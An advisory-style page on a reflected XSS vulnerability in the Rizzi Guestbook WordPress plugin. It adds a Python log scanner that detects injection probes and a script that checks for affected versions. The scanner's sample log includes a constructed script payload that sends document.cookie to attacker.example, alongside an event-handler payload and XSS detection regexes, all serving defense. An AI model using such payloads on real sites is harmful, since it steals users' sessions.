CVE-2025-26573
Published: 26 March 2025
Description
Reflected cross-site scripting in the Rizzi Guestbook WordPress plugin (all versions up to and including 4.0.1) lets an attacker who gets a user to open a crafted link run JavaScript in that user's browser; a session cookie stolen this way can then be used to authenticate to the site as the victim.
Security Summary
CVE-2025-26573 is an Improper Neutralization of Input During Web Page Generation vulnerability (CWE-79), specifically a reflected cross-site scripting (XSS) flaw, in the Rizzi Guestbook WordPress plugin (slug rizzi-guestbook) from JamRizzi Technologies. All plugin versions up to and including 4.0.1 are affected. The issue was published on 2025-03-26 with a CVSS v3.1 base score of 7.1 (High), vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L.
The flaw is exploitable remotely over the network (AV:N) with low attack complexity (AC:L) and no privileges (PR:N), but it requires user interaction (UI:R): a victim must open a crafted link, typically delivered by phishing or a malicious page. The scope is changed (S:C) because the vulnerable component is the plugin on the server while the impact lands in the victim's browser, where the injected JavaScript runs in the origin of the WordPress site. From there it can read page content, issue requests that carry the victim's session, and, if the session cookie is not flagged HttpOnly, exfiltrate the cookie itself; CVSS rates confidentiality, integrity and availability impact as low (C:L/I:L/A:L) because the attacker acts only with the victim's own browser-side privileges.
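Because exploitation is a crafted link hitting the plugin over HTTP, the web server access log is the first place to look for probing and for the victim's click. The following detection logic is an added example, not code from the advisory, Patchstack, or the plugin: it scans combined-format log lines for requests under the plugin's directory whose query parameters carry a script-injection payload, undoing nested URL encoding first, and tags each hit with the ATT&CK techniques this page maps the CVE to. The plugin path is built from the slug on the page; the parameter names, IPs and requests in the sample log are constructed for illustration, since the advisory does not publish the vulnerable parameter.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Plugin slug from the advisory; every request under this path is inspected.
PLUGIN_PATH = "/wp-content/plugins/rizzi-guestbook/"

# Combined log format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)'
)

# Heuristic indicators of a script-injection attempt, checked after URL decoding.
XSS_INDICATORS = [
    ("html-tag", re.compile(r"<\s*/?\s*(script|svg|img|iframe|object|embed)\b", re.I)),
    ("event-handler", re.compile(
        r"\bon(error|load|click|mouse[a-z]+|focus|blur|key[a-z]+|input|change|submit|toggle)\s*=",
        re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
]

# Constructed sample traffic (not real logs). The vulnerable parameter is not
# published, so "name" and "msg" are placeholders; only the plugin path is from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Mar/2025:10:12:01 +0000] "GET /wp-content/plugins/rizzi-guestbook/index.php?page=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Mar/2025:10:12:05 +0000] "GET /wp-content/plugins/rizzi-guestbook/index.php?name=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1610 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Mar/2025:10:13:10 +0000] "GET /?p=42 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Mar/2025:10:14:22 +0000] "GET /wp-content/plugins/rizzi-guestbook/index.php?msg=%22%20onmouseover%3Dalert(1)%20x%3D%22 HTTP/1.1" 200 1590 "-" "curl/8.4"
"""


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding (a common filter-evasion trick) until the value is stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_probes(log_text: str) -> list[dict]:
    """One finding per query parameter on a plugin request that carries an XSS indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, ts, method, target, status = m.group(1), m.group(2), m.group(3), m.group(4), m.group(5)
        url = urlsplit(target)
        if not url.path.startswith(PLUGIN_PATH):
            continue
        for param, raw_value in parse_qsl(url.query, keep_blank_values=True):
            payload = decode_fully(raw_value)
            hits = [label for label, rx in XSS_INDICATORS if rx.search(payload)]
            if not hits:
                continue
            # ATT&CK mapping used by this advisory: script execution is T1059.007;
            # a payload that reads document.cookie is additionally T1539.
            techniques = ["T1059.007"]
            if "document.cookie" in payload:
                techniques.append("T1539")
            findings.append({
                "ip": ip, "time": ts, "method": method, "status": status,
                "param": param, "payload": payload,
                "indicators": hits, "techniques": techniques,
            })
    return findings


if __name__ == "__main__":
    for f in find_xss_probes(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['param']}={f['payload']!r} {f['indicators']} {f['techniques']}")
```

Two caveats when reading the output: a 200 status does not tell you whether the plugin actually reflected the payload, only that the request was served, so confirm reflection in a test copy of the site; and a successful attack looks the same in the log as a probe, except that the source IP is the victim's rather than the attacker's.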
The primary advisory reference is Patchstack's write-up of the XSS vulnerability in the WordPress Rizzi Guestbook plugin up to version 4.0.1. Practitioners should check that source for the specific remediation (a fixed release or a workaround); until one is confirmed, any install at version 4.0.1 or earlier should be treated as exposed.
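Finding exposed installs means comparing each site's plugin version against the advisory's affected range, and plain string comparison gets that wrong (e.g. "4.0.10" sorts before "4.0.1"). The following is an added example, not code from the advisory, Patchstack, or the plugin: it reads the JSON that `wp plugin list --format=json` emits (fields name, status, update, version) and reports Rizzi Guestbook entries at or below 4.0.1. The sample JSON is constructed for illustration; the plugin slug and version boundary are from the page.

```python
import json
import re

# From the advisory: the Rizzi Guestbook plugin, all versions up to and including 4.0.1.
AFFECTED_SLUG = "rizzi-guestbook"
LAST_AFFECTED_VERSION = "4.0.1"

# Constructed sample of `wp plugin list --format=json` output (not from a real site).
SAMPLE_WP_PLUGIN_LIST = json.dumps([
    {"name": "akismet", "status": "active", "update": "none", "version": "5.3.5"},
    {"name": "rizzi-guestbook", "status": "inactive", "update": "none", "version": "4.0.1"},
])


def version_key(version: str) -> tuple:
    """Numeric tuple for ordering: 4.0.10 must sort after 4.0.1.
    A non-numeric suffix (e.g. 4.0.1-beta) is dropped, so a pre-release counts as its base version."""
    numeric = re.match(r"[\d.]+", version.strip())
    if not numeric:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in numeric.group(0).split(".") if p)


def is_affected(version: str) -> bool:
    """True when the version falls inside the advisory's range (<= 4.0.1)."""
    return version_key(version) <= version_key(LAST_AFFECTED_VERSION)


def affected_installs(plugin_list_json: str) -> list[dict]:
    """Return the rizzi-guestbook entries within the affected range, whatever their activation
    status: the advisory does not say deactivating the plugin is a mitigation, so inactive
    copies are reported too."""
    return [
        p for p in json.loads(plugin_list_json)
        if p.get("name") == AFFECTED_SLUG and is_affected(p.get("version", "0"))
    ]


if __name__ == "__main__":
    for p in affected_installs(SAMPLE_WP_PLUGIN_LIST):
        print(f"{p['name']} {p['version']} ({p['status']}): within affected range, see Patchstack advisory")
```

Feed it the real output of `wp plugin list --format=json` from each site (for example via `wp --path=/var/www/site plugin list --format=json`) to get an inventory of exposed installs.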
Details
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
- MITRE ATT&CK Enterprise Techniques: T1059.007 (Command and Scripting Interpreter: JavaScript), T1185 (Browser Session Hijacking), T1539 (Steal Web Session Cookie), T1550.004 (Use Alternate Authentication Material: Web Session Cookie)
Why these techniques?
Reflected XSS gives the attacker arbitrary JavaScript execution in the victim's browser (T1059.007). That primitive enables the session-oriented techniques this CVE's impacts describe: stealing the web session cookie (T1539), reusing it to authenticate as the victim (T1550.004), and acting inside the victim's live browser session (T1185).